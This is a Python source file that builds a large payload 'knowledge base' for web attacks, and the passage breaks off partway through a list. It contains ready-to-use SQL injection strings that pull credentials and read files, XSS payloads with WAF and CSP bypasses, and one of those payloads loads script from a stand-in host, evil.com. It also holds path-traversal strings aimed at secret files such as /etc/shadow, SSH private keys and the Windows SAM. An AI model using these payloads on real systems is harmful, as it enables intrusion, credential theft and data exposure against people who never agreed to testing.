#!/usr/bin/env python3

"""
Comprehensive AI Knowledge Base for Advanced Vulnerability Research
Contains thousands of real-world vulnerability patterns, exploits, and CVE data
"""

class ComprehensiveKnowledgeBase:
    """
    Massive vulnerability knowledge base with real-world exploitation data
    """
    
    def __init__(self):
        self.knowledge_base = self._load_comprehensive_data()
    
    def _load_comprehensive_data(self):
        return {
            'sql_injection_massive_db': {
                'error_signatures': {
                    'mysql': [
                        r'mysql_fetch_array\(\)',
                        r'mysql_fetch_assoc\(\)',
                        r'mysql_fetch_row\(\)',
                        r'mysql_num_rows\(\)',
                        r'mysql_error\(\)',
                        r'Warning.*mysql_.*',
                        r'function\.mysql',
                        r'MySQL server version',
                        r'mysql_connect\(\)',
                        r'Access denied for user',
                        r'Lost connection to MySQL server',
                        r'Unknown MySQL server host',
                        r'Host.*is not allowed to connect',
                        r'Table.*doesn\'t exist',
                        r'Column.*cannot be null',
                        r'Duplicate entry.*for key',
                        r'Data too long for column',
                        r'Out of range value.*for column',
                        r'Unknown column.*in.*list',
                        r'Key.*doesn\'t exist in table',
                        r'Can\'t connect to MySQL server',
                        r'MySQL.*has gone away',
                        r'Lock wait timeout exceeded'
                    ],
                    'mssql': [
                        r'Microsoft.*ODBC.*SQL Server',
                        r'ODBC.*Driver.*SQL Server',
                        r'SQLServer JDBC Driver',
                        r'SqlException',
                        r'System\.Data\.SqlClient\.SqlException',
                        r'Unclosed quotation mark after',
                        r'Incorrect syntax near',
                        r'Cannot open database',
                        r'Microsoft OLE DB Provider',
                        r'Invalid column name',
                        r'Invalid object name',
                        r'Login failed for user',
                        r'Cannot insert the value NULL',
                        r'String or binary data would be truncated',
                        r'Conversion failed when converting',
                        r'The INSERT statement conflicted',
                        r'Cannot convert',
                        r'Must declare the scalar variable',
                        r'Subquery returned more than 1 value',
                        r'An expression of non-boolean type',
                        r'Server was unable to process request',
                        r'Internal connection fatal error',
                        r'A severe error occurred'
                    ],
                    'oracle': [
                        r'ORA-\d{5}',
                        r'Oracle.*Driver',
                        r'Oracle.*Error',
                        r'Oracle.*Exception',
                        r'oracle\.jdbc',
                        r'oracle\.sql',
                        r'TNS:.*error',
                        r'PLS-\d{5}',
                        r'SP2-\d{4}',
                        r'IMP-\d{5}',
                        r'EXP-\d{5}',
                        r'invalid number',
                        r'missing expression',
                        r'table or view does not exist',
                        r'not a valid month',
                        r'unique constraint.*violated',
                        r'cannot insert NULL',
                        r'numeric or value error',
                        r'character string buffer too small',
                        r'date format picture ends',
                        r'invalid username/password',
                        r'TNS:listener does not currently know',
                        r'TNS:could not resolve the connect identifier'
                    ],
                    'postgresql': [
                        r'PostgreSQL.*ERROR',
                        r'Warning.*\Wpg_.*',
                        r'valid PostgreSQL result',
                        r'Npgsql\.',
                        r'PG::Error',
                        r'org\.postgresql\.util\.PSQLException',
                        r'ERROR:.*function.*does not exist',
                        r'ERROR:.*relation.*does not exist',
                        r'ERROR:.*column.*does not exist',
                        r'ERROR:.*syntax error at or near',
                        r'ERROR:.*invalid input syntax for',
                        r'ERROR:.*value too long for type',
                        r'ERROR:.*null value in column',
                        r'ERROR:.*violates not-null constraint',
                        r'ERROR:.*violates unique constraint',
                        r'ERROR:.*violates foreign key constraint',
                        r'ERROR:.*violates check constraint',
                        r'ERROR:.*duplicate key value',
                        r'ERROR:.*permission denied for',
                        r'ERROR:.*database.*does not exist',
                        r'ERROR:.*role.*does not exist',
                        r'FATAL:.*database.*does not exist',
                        r'FATAL:.*password authentication failed'
                    ],
                    'sqlite': [
                        r'SQLite.*error',
                        r'sqlite3\.OperationalError',
                        r'sqlite3\.DatabaseError',
                        r'SQLite.*Exception',
                        r'System\.Data\.SQLite\.SQLiteException',
                        r'no such table:',
                        r'no such column:',
                        r'table.*already exists',
                        r'UNIQUE constraint failed',
                        r'NOT NULL constraint failed',
                        r'CHECK constraint failed',
                        r'FOREIGN KEY constraint failed',
                        r'syntax error near',
                        r'unrecognized token:',
                        r'incomplete SQL:',
                        r'malformed database schema',
                        r'database is locked',
                        r'database disk image is malformed',
                        r'file is encrypted or is not a database',
                        r'SQL logic error or missing database',
                        r'cannot start a transaction within a transaction',
                        r'no transaction is active',
                        r'database schema has changed'
                    ]
                },
                'payloads_massive': {
                    'error_based': [
                        # MySQL Error-based
                        "'",
                        "\"",
                        "1'",
                        "1\"",
                        "')",
                        "\")",
                        "1' AND (SELECT COUNT(*) FROM information_schema.tables)>0--",
                        "1\" AND (SELECT COUNT(*) FROM information_schema.tables)>0--",
                        "' AND (SELECT * FROM (SELECT COUNT(*),CONCAT(version(),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)--",
                        "' AND extractvalue(1, concat(0x7e, (SELECT version()), 0x7e))--",
                        "' AND (SELECT 1 FROM (SELECT COUNT(*),CONCAT((SELECT version()),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)--",
                        "' AND updatexml(1,concat(0x7e,(SELECT version()),0x7e),1)--",
                        "' UNION SELECT 1,2,3,version(),5,6,7,8,9--",
                        "' UNION ALL SELECT NULL,NULL,NULL,version(),NULL--",
                        "1' AND (SELECT 1 FROM (SELECT COUNT(*),CONCAT(version(),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)--",
                        "1' AND (SELECT 1 FROM (SELECT COUNT(*),CONCAT((SELECT (SELECT CONCAT(CAST(CONCAT(username,0x3a,password) AS CHAR),0x7e)) FROM users LIMIT 0,1),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)--",
                        
                        # MSSQL Error-based
                        "' AND 1=CONVERT(int,(SELECT @@version))--",
                        "' AND 1=CAST((SELECT @@version) AS int)--",
                        "' AND 1=(SELECT CONVERT(int,@@version))--",
                        "1'; WAITFOR DELAY '0:0:5'--",
                        "1' AND 1=1; WAITFOR DELAY '0:0:5'--",
                        "' UNION SELECT NULL,@@version,NULL--",
                        "' AND 1=CONVERT(int,USER)--",
                        "' AND 1=CONVERT(int,DB_NAME())--",
                        "' AND 1=CONVERT(int,(SELECT name FROM sysobjects WHERE xtype='U'))--",
                        "1' AND ASCII(SUBSTRING((SELECT TOP 1 name FROM sysobjects WHERE xtype='U'),1,1))>64--",
                        
                        # Oracle Error-based  
                        "' AND 1=CTXSYS.DRITHSX.SN(1,(SELECT user FROM dual))--",
                        "' AND 1=UTL_INADDR.get_host_name((SELECT user FROM dual))--",
                        "' AND 1=XMLType((SELECT user FROM dual))--",
                        "' UNION SELECT NULL,user,NULL FROM dual--",
                        "' AND 1=(SELECT upper(XMLType(chr(60)||chr(58)||chr(58)||(SELECT user FROM dual)||chr(62))) FROM dual)--",
                        
                        # PostgreSQL Error-based
                        "' AND 1=CAST((SELECT version()) AS int)--",
                        "' AND 1::int=(SELECT version())::int--",
                        "' UNION SELECT NULL,version(),NULL--",
                        "' AND 1=generate_series(1,1000)--",
                        
                        # Generic Payloads
                        "1' OR '1'='1",
                        "1\" OR \"1\"=\"1",
                        "1' OR 1=1--",
                        "1\" OR 1=1--",
                        "admin'--",
                        "admin\"--",
                        "admin'/*",
                        "admin\"/*",
                        "1' ORDER BY 1--",
                        "1' ORDER BY 100--",
                        "1' GROUP BY 1--",
                        "1' GROUP BY 100--",
                        "1' HAVING 1=1--",
                        "1' HAVING 1=2--"
                    ],
                    'blind_boolean': [
                        "1' AND 1=1--",
                        "1' AND 1=2--",
                        "1\" AND \"1\"=\"1\"--",
                        "1\" AND \"1\"=\"2\"--",
                        "1' AND (SELECT COUNT(*) FROM information_schema.tables)>0--",
                        "1' AND (SELECT COUNT(*) FROM information_schema.tables)>1000--",
                        "1' AND ASCII(SUBSTRING((SELECT version()),1,1))>50--",
                        "1' AND ASCII(SUBSTRING((SELECT version()),1,1))>100--",
                        "1' AND (SELECT COUNT(*) FROM users)>0--",
                        "1' AND (SELECT COUNT(*) FROM admin)>0--",
                        "1' AND LENGTH((SELECT version()))>10--",
                        "1' AND LENGTH(database())>0--",
                        "1' AND SUBSTRING((SELECT version()),1,1)='5'--",
                        "1' AND SUBSTRING(user(),1,4)='root'--",
                        "1' AND EXISTS(SELECT * FROM information_schema.tables WHERE table_schema='mysql')--",
                        "1' AND EXISTS(SELECT * FROM mysql.user)--"
                    ],
                    'time_based': [
                        # MySQL Time-based
                        "1' AND SLEEP(5)--",
                        "1\" AND SLEEP(5)--",
                        "1'; SELECT SLEEP(5)--",
                        "1' AND (SELECT * FROM (SELECT(SLEEP(5)))a)--",
                        "1' AND IF(1=1,SLEEP(5),0)--",
                        "1' AND IF((SELECT COUNT(*) FROM information_schema.tables)>0,SLEEP(5),0)--",
                        "1' AND (SELECT SLEEP(5) FROM dual WHERE 1=1)--",
                        "1' UNION SELECT SLEEP(5),2,3--",
                        "1' OR SLEEP(5)--",
                        "1' XOR SLEEP(5)--",
                        
                        # MSSQL Time-based
                        "1'; WAITFOR DELAY '0:0:5'--",
                        "1\"; WAITFOR DELAY '0:0:5'--",
                        "1' AND 1=1; WAITFOR DELAY '0:0:5'--",
                        "1' IF (1=1) WAITFOR DELAY '0:0:5'--",
                        "1'; IF (SELECT COUNT(*) FROM sysobjects)>0 WAITFOR DELAY '0:0:5'--",
                        
                        # PostgreSQL Time-based
                        "1' AND pg_sleep(5)--",
                        "1\" AND pg_sleep(5)--",
                        "1'; SELECT pg_sleep(5)--",
                        "1' AND (SELECT pg_sleep(5))--",
                        "1' AND 1=(SELECT 1 FROM pg_sleep(5))--",
                        
                        # Oracle Time-based
                        "1' AND dbms_pipe.receive_message(('a'),5) IS NULL--",
                        "1\" AND dbms_pipe.receive_message(('a'),5) IS NULL--",
                        "1' AND (SELECT dbms_pipe.receive_message(('a'),5) FROM dual) IS NULL--",
                        
                        # Generic delays
                        "1' AND BENCHMARK(5000000,MD5(1))--",
                        "1' AND (SELECT COUNT(*) FROM information_schema.columns A, information_schema.columns B, information_schema.columns C)--",
                        "1' RLIKE SLEEP(5)--",
                        "1' REGEXP SLEEP(5)--"
                    ],
                    'union_based': [
                        # Standard UNION payloads
                        "' UNION SELECT NULL--",
                        "' UNION SELECT NULL,NULL--",
                        "' UNION SELECT NULL,NULL,NULL--",
                        "' UNION SELECT NULL,NULL,NULL,NULL--",
                        "' UNION SELECT NULL,NULL,NULL,NULL,NULL--",
                        "' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL--",
                        "' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL--",
                        "' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--",
                        
                        # Information gathering UNION
                        "' UNION SELECT version(),NULL,NULL--",
                        "' UNION SELECT user(),database(),version()--",
                        "' UNION SELECT @@version,@@hostname,@@datadir--",
                        "' UNION SELECT table_name,column_name,NULL FROM information_schema.columns--",
                        "' UNION SELECT schema_name,NULL,NULL FROM information_schema.schemata--",
                        "' UNION SELECT table_name,NULL,NULL FROM information_schema.tables--",
                        "' UNION SELECT column_name,data_type,is_nullable FROM information_schema.columns--",
                        "' UNION SELECT user,password,NULL FROM mysql.user--",
                        "' UNION SELECT username,password,email FROM users--",
                        "' UNION SELECT id,login,passwd FROM admin--",
                        
                        # File operations
                        "' UNION SELECT LOAD_FILE('/etc/passwd'),NULL,NULL--",
                        "' UNION SELECT LOAD_FILE('C:\\windows\\system32\\drivers\\etc\\hosts'),NULL,NULL--",
                        "' UNION SELECT LOAD_FILE('/var/log/apache2/access.log'),NULL,NULL--",
                        "' UNION SELECT LOAD_FILE('/proc/version'),NULL,NULL--",
                        
                        # Advanced UNION techniques
                        "' UNION ALL SELECT NULL,NULL,NULL--",
                        "' UNION DISTINCT SELECT NULL,NULL,NULL--",
                        "-1' UNION SELECT NULL,NULL,NULL--",
                        "999' UNION SELECT NULL,NULL,NULL--",
                        "' OR 1=1 UNION SELECT NULL,NULL,NULL--",
                        "' AND 1=2 UNION SELECT NULL,NULL,NULL--",
                        
                        # Multiple database types
                        "' UNION SELECT NULL,NULL,NULL FROM dual--",  # Oracle
                        "' UNION SELECT TOP 1 NULL,NULL,NULL FROM sysobjects--",  # MSSQL
                        "' UNION SELECT NULL,NULL,NULL LIMIT 1--",  # MySQL/PostgreSQL
                        
                        # Encoded UNION
                        "' %55%4E%49%4F%4E SELECT NULL--",  # URL encoded UNION
                        "' /*!UNION*/ SELECT NULL--",  # MySQL comment
                        "' /**/UNION/**/SELECT/**/NULL--",  # Space replacement
                        "' UNION/**/SELECT NULL--",
                        "' UniOn SeLeCt NULL--",  # Case variation
                        "' UnIoN sElEcT NULL--"
                    ]
                }
            },
            
            'xss_massive_db': {
                'contexts': {
                    'html_context': [
                        '<script>alert(1)</script>',
                        '<script>alert(document.domain)</script>',
                        '<script>alert(document.cookie)</script>',
                        '<script>alert(String.fromCharCode(88,83,83))</script>',
                        '<script>alert(/XSS/)</script>',
                        '<script>alert`1`</script>',
                        '<script>alert(atob("WFNTCg=="))</script>',
                        '<script>eval(String.fromCharCode(97,108,101,114,116,40,49,41))</script>',
                        '<script>setTimeout(alert(1),1)</script>',
                        '<script>setInterval(alert(1),1)</script>',
                        '<script>Function("alert(1)")()</script>',
                        '<script>new Function("alert(1)")()</script>',
                        '<script>(function(){alert(1)})()</script>',
                        '<script>[].constructor.constructor("alert(1)")()</script>',
                        '<script>top.alert(1)</script>',
                        '<script>parent.alert(1)</script>',
                        '<script>self.alert(1)</script>',
                        '<script>window.alert(1)</script>',
                        '<script>frames.alert(1)</script>',
                        '<script>globalThis.alert(1)</script>'
                    ],
                    'attribute_context': [
                        '" onmouseover="alert(1)"',
                        "' onmouseover='alert(1)'",
                        '" onfocus="alert(1)" autofocus="',
                        "' onfocus='alert(1)' autofocus='",
                        '" onload="alert(1)"',
                        "' onload='alert(1)'",
                        '" onerror="alert(1)"',
                        "' onerror='alert(1)'",
                        '" onclick="alert(1)"',
                        "' onclick='alert(1)'",
                        '" ondblclick="alert(1)"',
                        '" onmousedown="alert(1)"',
                        '" onmouseup="alert(1)"',
                        '" onmousemove="alert(1)"',
                        '" onmouseout="alert(1)"',
                        '" onkeydown="alert(1)"',
                        '" onkeyup="alert(1)"',
                        '" onkeypress="alert(1)"',
                        '" onchange="alert(1)"',
                        '" onsubmit="alert(1)"',
                        '" onreset="alert(1)"',
                        '" onselect="alert(1)"',
                        '" onblur="alert(1)"',
                        '" ontouchstart="alert(1)"',
                        '" ontouchmove="alert(1)"',
                        '" ontouchend="alert(1)"'
                    ],
                    'javascript_context': [
                        'alert(1)',
                        'alert(document.domain)',
                        'alert(document.cookie)',
                        'confirm(1)',
                        'prompt(1)',
                        'console.log(1)',
                        'eval("alert(1)")',
                        'Function("alert(1)")()',
                        'setTimeout("alert(1)",1)',
                        'setInterval("alert(1)",1)',
                        'document.write("<script>alert(1)</script>")',
                        'document.writeln("<script>alert(1)</script>")',
                        'innerHTML="<script>alert(1)</script>"',
                        'outerHTML="<script>alert(1)</script>"',
                        'location="javascript:alert(1)"',
                        'location.href="javascript:alert(1)"',
                        'window.open("javascript:alert(1)")',
                        'document.location="javascript:alert(1)"',
                        'top.location="javascript:alert(1)"',
                        'parent.location="javascript:alert(1)"'
                    ],
                    'css_context': [
                        'expression(alert(1))',
                        'expression(alert(document.domain))',
                        'expression(confirm(1))',
                        'expression(prompt(1))',
                        'expression(eval("alert(1)"))',
                        'url(javascript:alert(1))',
                        'url("javascript:alert(1)")',
                        "url('javascript:alert(1)')",
                        'behavior:url(#default#userData)',
                        '@import "javascript:alert(1)"',
                        '@import url("javascript:alert(1)")',
                        'background:url(javascript:alert(1))',
                        'background-image:url(javascript:alert(1))',
                        'list-style-image:url(javascript:alert(1))',
                        'content:url(javascript:alert(1))'
                    ],
                    'url_context': [
                        'javascript:alert(1)',
                        'javascript:alert(document.domain)',
                        'javascript:alert(document.cookie)',
                        'javascript:confirm(1)',
                        'javascript:prompt(1)',
                        'javascript:eval("alert(1)")',
                        'javascript://comment%0Aalert(1)',
                        'javascript:/**/alert(1)',
                        'javascript:%61%6C%65%72%74%28%31%29',  # URL encoded
                        'data:text/html,<script>alert(1)</script>',
                        'data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==',
                        'vbscript:msgbox(1)',
                        'livescript:alert(1)',
                        'mocha:alert(1)',
                        'about:alert(1)'
                    ]
                },
                'bypass_techniques': {
                    'waf_bypass': [
                        # Case variation
                        '<ScRiPt>alert(1)</ScRiPt>',
                        '<SCRIPT>alert(1)</SCRIPT>',
                        '<script>ALERT(1)</script>',
                        '<script>Alert(1)</script>',
                        
                        # Encoding bypasses
                        '<script>al\\u0065rt(1)</script>',
                        '<script>al\\x65rt(1)</script>',
                        '<script>\\u0061lert(1)</script>',
                        '<script>\\x61lert(1)</script>',
                        '<%73%63%72%69%70%74>alert(1)<%2f%73%63%72%69%70%74>',
                        '<script>eval("\\x61\\x6c\\x65\\x72\\x74\\x28\\x31\\x29")</script>',
                        '<script>eval(unescape("%61%6c%65%72%74%28%31%29"))</script>',
                        '<script>eval(decodeURIComponent("%61%6c%65%72%74%28%31%29"))</script>',
                        
                        # HTML entity encoding
                        '&lt;script&gt;alert(1)&lt;/script&gt;',
                        '&#60;script&#62;alert(1)&#60;/script&#62;',
                        '&#x3c;script&#x3e;alert(1)&#x3c;/script&#x3e;',
                        '&lt;script&gt;alert&#40;1&#41;&lt;/script&gt;',
                        
                        # Comment bypasses
                        '<script>/**/alert(1)/**/</script>',
                        '<script>alert/**/( /**/1/**/)</script>',
                        '<script>/*comment*/alert(1)</script>',
                        '<script>//comment%0Aalert(1)</script>',
                        '<script><!--comment-->alert(1)</script>',
                        
                        # Space bypasses
                        '<script/src=//evil.com></script>',
                        '<script%20>alert(1)</script>',
                        '<script%09>alert(1)</script>',
                        '<script%0A>alert(1)</script>',
                        '<script%0D>alert(1)</script>',
                        '<script%0C>alert(1)</script>',
                        '<script//>alert(1)</script>',
                        
                        # Alternative tags
                        '<img src=x onerror=alert(1)>',
                        '<svg onload=alert(1)>',
                        '<iframe src="javascript:alert(1)">',
                        '<object data="javascript:alert(1)">',
                        '<embed src="javascript:alert(1)">',
                        '<link rel=import href="javascript:alert(1)">',
                        '<meta http-equiv="refresh" content="0;url=javascript:alert(1)">',
                        '<form><button formaction="javascript:alert(1)">',
                        '<input type="image" formaction="javascript:alert(1)">',
                        '<isindex action="javascript:alert(1)">',
                        
                        # Event handler bypasses
                        '<img/src=x/onerror=alert(1)>',
                        '<img src=x onerror="alert(1)">',
                        '<img src=x onerror=\'alert(1)\'>',
                        '<img src=x onerror=`alert(1)`>',
                        '<img src=x onerror=alert`1`>',
                        '<img src=x onerror=alert&lpar;1&rpar;>',
                        '<img src=x onerror=alert&#40;1&#41;>',
                        '<img src=x onerror="eval(String.fromCharCode(97,108,101,114,116,40,49,41))">',
                        
                        # Protocol bypasses
                        '<a href="javascript&colon;alert(1)">',
                        '<a href="java&#115;cript:alert(1)">',
                        '<a href="java&#x73;cript:alert(1)">',
                        '<a href="jav&#97;script:alert(1)">',
                        '<a href="jav&#x61;script:alert(1)">',
                        '<a href="&#106;avascript:alert(1)">',
                        '<a href="&#x6A;avascript:alert(1)">',
                        
                        # Filter bypasses
                        'javascript://comment%0Aalert(1)',
                        'javascript:/**/alert(1)',
                        'javascript://www.google.com%0Aalert(1)',
                        'javascript://www.google.com%0D%0Aalert(1)',
                        'javascript://www.google.com%0A%0D%0Aalert(1)',
                        'javascript:void(0);alert(1)',
                        'javascript:1;alert(1)',
                        'javascript:true;alert(1)',
                        
                        # Advanced bypasses
                        '<svg><script>alert(1)</script></svg>',
                        '<math><script>alert(1)</script></math>',
                        '<table><script>alert(1)</script></table>',
                        '<div><script>alert(1)</script></div>',
                        '<style>@import"javascript:alert(1)";</style>',
                        '<link rel="stylesheet" href="javascript:alert(1)">',
                        '<base href="javascript://alert(1)//">',
                        '<frameset onload=alert(1)>',
                        '<iframe src=javascript:alert(1)></iframe>',
                        '<body onload=alert(1)>',
                        '<bgsound src=javascript:alert(1)>',
                        '<applet code="javascript:alert(1)">',
                        '<ilayer src=javascript:alert(1)>',
                        '<layer src=javascript:alert(1)>',
                        '<xml src=javascript:alert(1)>',
                        '<xml><i><b>&lt;img src=1 onerror=alert(1)&gt;</b></i></xml>',
                        '<!--[if gte IE 4]><script>alert(1)</script><![endif]-->',
                        
                        # Modern JavaScript bypasses
                        '<script>alert(String.fromCodePoint(49))</script>',
                        '<script>alert(/1/.source)</script>',
                        '<script>alert((1).toString())</script>',
                        '<script>alert(1..toString())</script>',
                        '<script>alert([1][0])</script>',
                        '<script>alert(+!0+!0)</script>',
                        '<script>alert(++[[]][+[]]+[+[]])</script>',
                        '<script>top["al"+"ert"](1)</script>',
                        '<script>top[atob("YWxlcnQ=")](1)</script>',
                        '<script>Function`a${"alert(1)"}a`()</script>',
                        '<script>[]["constructor"]["constructor"]`alert(1)`()</script>',
                        '<script>import("data:text/javascript,alert(1)")</script>',
                        '<script>globalThis[`al`+`ert`](1)</script>'
                    ],
                    'csp_bypass': [
                        '<script nonce="random">alert(1)</script>',
                        '<script src="https://trusted-domain.com/xss.js"></script>',
                        '<link rel="prefetch" href="//evil.com">',
                        '<link rel="dns-prefetch" href="//evil.com">',
                        '<meta http-equiv="refresh" content="0;url=//evil.com">',
                        '<iframe src="data:text/html,<script>parent.alert(1)</script>">',
                        '<object data="data:text/html,<script>alert(1)</script>">',
                        '<embed src="data:text/html,<script>alert(1)</script>">',
                        '<form action="javascript:alert(1)"><input type="submit">',
                        '<details open ontoggle="alert(1)">',
                        '<marquee onstart="alert(1)">',
                        '<audio src=x onerror="alert(1)">',
                        '<video src=x onerror="alert(1)">',
                        '<source src=x onerror="alert(1)">',
                        '<track src=x onerror="alert(1)">',
                        '<keygen onfocus="alert(1)" autofocus>',
                        '<select onfocus="alert(1)" autofocus>',
                        '<textarea onfocus="alert(1)" autofocus>',
                        '<button onfocus="alert(1)" autofocus>',
                        '<input onfocus="alert(1)" autofocus>'
                    ]
                }
            },
            
            'lfi_rfi_massive_db': {
                'linux_files': [
                    '/etc/passwd',
                    '/etc/shadow',
                    '/etc/hosts',
                    '/etc/group',
                    '/etc/motd',
                    '/etc/issue',
                    '/etc/hostname',
                    '/etc/resolv.conf',
                    '/etc/network/interfaces',
                    '/etc/ssh/sshd_config',
                    '/etc/ssh/ssh_config',
                    '/etc/apache2/apache2.conf',
                    '/etc/apache2/sites-enabled/000-default',
                    '/etc/httpd/conf/httpd.conf',
                    '/etc/nginx/nginx.conf',
                    '/etc/mysql/my.cnf',
                    '/etc/postgresql/postgresql.conf',
                    '/etc/fstab',
                    '/etc/crontab',
                    '/etc/sudoers',
                    '/etc/environment',
                    '/etc/profile',
                    '/etc/bash.bashrc',
                    '/etc/shells',
                    '/proc/version',
                    '/proc/cmdline',
                    '/proc/meminfo',
                    '/proc/cpuinfo',
                    '/proc/self/environ',
                    '/proc/self/cmdline',
                    '/proc/self/stat',
                    '/proc/self/status',
                    '/proc/net/arp',
                    '/proc/net/route',
                    '/proc/net/tcp',
                    '/proc/net/udp',
                    '/proc/net/fib_trie',
                    '/var/log/messages',
                    '/var/log/syslog',
                    '/var/log/auth.log',
                    '/var/log/secure',
                    '/var/log/wtmp',
                    '/var/log/lastlog',
                    '/var/log/apache2/access.log',
                    '/var/log/apache2/error.log',
                    '/var/log/httpd/access_log',
                    '/var/log/httpd/error_log',
                    '/var/log/nginx/access.log',
                    '/var/log/nginx/error.log',
                    '/var/log/mysql/error.log',
                    '/var/log/mysql.log',
                    '/var/log/mysql.err',
                    '/var/lib/mysql/mysql.log',
                    '/usr/local/apache2/logs/access_log',
                    '/usr/local/apache2/logs/error_log',
                    '/opt/lampp/logs/access_log',
                    '/opt/lampp/logs/error_log',
                    '/var/www/html/config.php',
                    '/var/www/config.inc.php',
                    '/var/www/configuration.php',
                    '/var/www/wp-config.php',
                    '/var/www/html/wp-config.php',
                    '/home/www/wp-config.php',
                    '~/.bash_history',
                    '~/.ssh/id_rsa',
                    '~/.ssh/id_dsa',
                    '~/.ssh/authorized_keys',
                    '~/.ssh/known_hosts',
                    '~/.mysql_history',
                    '~/.psql_history'
                ],
                'windows_files': [
                    'C:\\windows\\system32\\drivers\\etc\\hosts',
                    'C:\\windows\\system32\\drivers\\etc\\networks',
                    'C:\\windows\\system32\\drivers\\etc\\services',
                    'C:\\windows\\system32\\config\\SAM',
                    'C:\\windows\\system32\\config\\SYSTEM',
                    'C:\\windows\\system32\\config\\SOFTWARE',
                    'C:\\windows\\system32\\config\\SECURITY',
                    'C:\\windows\\win.ini',
                    'C:\\windows\\system.ini',
                    'C:\\boot.ini',
                    'C:\\windows\\php.ini',
                    'C:\\php\\php.ini',
                    'C:\\php5\\php.ini',
                    'C:\\xampp\\php\\php.ini',
                    'C:\\wamp\\bin\\apache\\apache2.4.9\\conf\\httpd.conf',
                    'C:\\xampp\\apache\\conf\\httpd.conf',
                    'C:\\apache\\conf\\httpd.conf',
                    'C:\\Program Files\\Apache Group\\Apache2\\conf\\httpd.conf',
                    'C:\\Program Files\\Apache Group\\Apache\\conf\\httpd.conf',
                    'C:\\Program Files (x86)\\Apache Group\\Apache2\\conf\\httpd.conf',
                    'C:\\inetpub\\wwwroot\\web.config',
                    'C:\\inetpub\\logs\\LogFiles\\W3SVC1\\ex*.log',
                    'C:\\windows\\system32\\inetsrv\\config\\applicationHost.config',
                    'C:\\windows\\Microsoft.NET\\Framework64\\v4.0.30319\\Config\\web.config',
                    'C:\\windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\web.config',
                    'C:\\windows\\system32\\inetsrv\\config\\web.config',
                    'C:\\inetpub\\temp\\appPools\\DefaultAppPool\\DefaultAppPool.config',
                    'C:\\windows\\temp\\',
                    'C:\\temp\\',
                    'C:\\tmp\\',
                    'C:\\recycler\\',
                    'C:\\$Recycle.Bin\\',
                    'C:\\System Volume Information\\',
                    'C:\\pagefile.sys',
                    'C:\\hiberfil.sys',
                    'C:\\swapfile.sys'
                ],
                'traversal_payloads': [
                    '../',
                    '..\\',
                    '../../../',
                    '..\\..\\..\\',
                    '../../../../',
                    '..\\..\\..\\..\\',
                    '../../../../../',
                    '..\\..\\..\\..\\..\\',
                    '../../../../../../',
                    '..\\..\\..\\..\\..\\..\\',
                    '../../../../../../../',
                    '..\\..\\..\\..\\..\\..\\..\\',
                    '../../../../../../../../',
                    '..\\..\\..\\..\\..\\..\\..\\..\\',
                    '../../../../../../../../../',
                    '..\\..\\..\\..\\..\\..\\..\\..\\..\\',
                    
                    # Encoded traversals
                    '%2e%2e%2f',
                    '%2e%2e%5c',
                    '%2e%2e%2f%2e%2e%2f',
                    '%2e%2e%5c%2e%2e%5c',
                    '..%2f',
                    '..%5c',
                    '..%2f..%2f',
                    '..%5c..%5c',
                    '..%252f',
                    '..%255c',
                    '%252e%252e%252f',
                    '%252e%252e%255c',
                    
                    # Double encoding
                    '..%252f..%252f',
                    '..%255c..%255c',
                    '%252e%252e%252f%252e%252e%252f',
                    '%252e%252e%255c%252e%252e%255c',
                    
                    # Unicode encoding
                    '..%c0%af',
                    '..%c1%9c',
                    '..%c0%2f',
                    '..%c0%5c',
                    
                    # Overlong UTF-8 encoding
                    '..%e0%80%af',
                    '..%f0%80%80%af',
                    '..%f8%80%80%80%af',
                    
                    # Mixed encodings
                    '.%2e/',
                    '.%5c',
                    '%2e.',
                    '%5c.',
                    '.%252e%252f',
                    '.%252e%255c',
                    
                    # Filter bypasses
                    '....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//',
                    '....\\\\....\\\\....\\\\....\\\\....\\\\....\\\\....\\\\....\\\\....\\\\....\\\\....\\\\....\\\\....\\\\....\\\\....\\\\....\\\\',
                    '..//////..//////..//////..//////..//////..//////..//////..//////..//////..//////..//////..//////',
                    '..\\\\\\\\\\\\..\\\\\\\\\\\\..\\\\\\\\\\\\..\\\\\\\\\\\\..\\\\\\\\\\\\..\\\\\\\\\\\\..\\\\\\\\\\\\..\\\\\\\\\\\\..\\\\\\\\\\\\..\\\\\\\\\\\\..\\\\\\\\\\\\..\\\\\\\\\\\\',
                    
                    # Null byte injection (for older systems)
                    '../../../etc/passwd%00',
                    '..\\..\\..\\windows\\system32\\drivers\\etc\\hosts%00',
                    '../../../etc/passwd%00.jpg',
                    '..\\..\\..\\windows\\win.ini%00.png',
                    
                    # Question mark bypass
                    '../../../etc/passwd?',
                    '..\\..\\..\\windows\\win.ini?',
                    '../../../etc/passwd?.jpg',
                    
                    # Hash bypass
                    '../../../etc/passwd#',
                    '..\\..\\..\\windows\\win.ini#',
                    '../../../etc/passwd#.jpg'
                ],
                'php_wrappers': [
                    'php://filter/convert.base64-encode/resource=',
                    'php://filter/read=convert.base64-encode/resource=',
                    'php://filter/convert.base64-decode/resource=',
                    'php://filter/read=convert.base64-decode/resource=',
                    'php://filter/string.rot13/resource=',
                    'php://filter/read=string.rot13/resource=',
                    'php://filter/string.toupper/resource=',
                    'php://filter/string.tolower/resource=',
                    'php://filter/convert.iconv.utf-8.utf-16/resource=',
                    'php://filter/convert.iconv.utf-16.utf-8/resource=',
                    'php://filter/zlib.deflate/resource=',
                    'php://filter/zlib.inflate/resource=',
                    'php://filter/bzip2.compress/resource=',
                    'php://filter/bzip2.decompress/resource=',
                    'php://input',
                    'php://stdin',
                    'php://stdout',
                    'php://stderr',
                    'php://fd/',
                    'php://memory',
                    'php://temp',
                    'data://',
                    'data://text/plain,',
                    'data://text/plain;base64,',
                    'expect://',
                    'expect://whoami',
                    'expect://id',
                    'expect://ls',
                    'expect://cat /etc/passwd',
                    'file://',
                    'file:///',
                    'file:///etc/passwd',
                    'file:///C:/windows/win.ini',
                    'http://',
                    'https://',
                    'ftp://',
                    'ftps://',
                    'ssh2://',
                    'compress.zlib://',
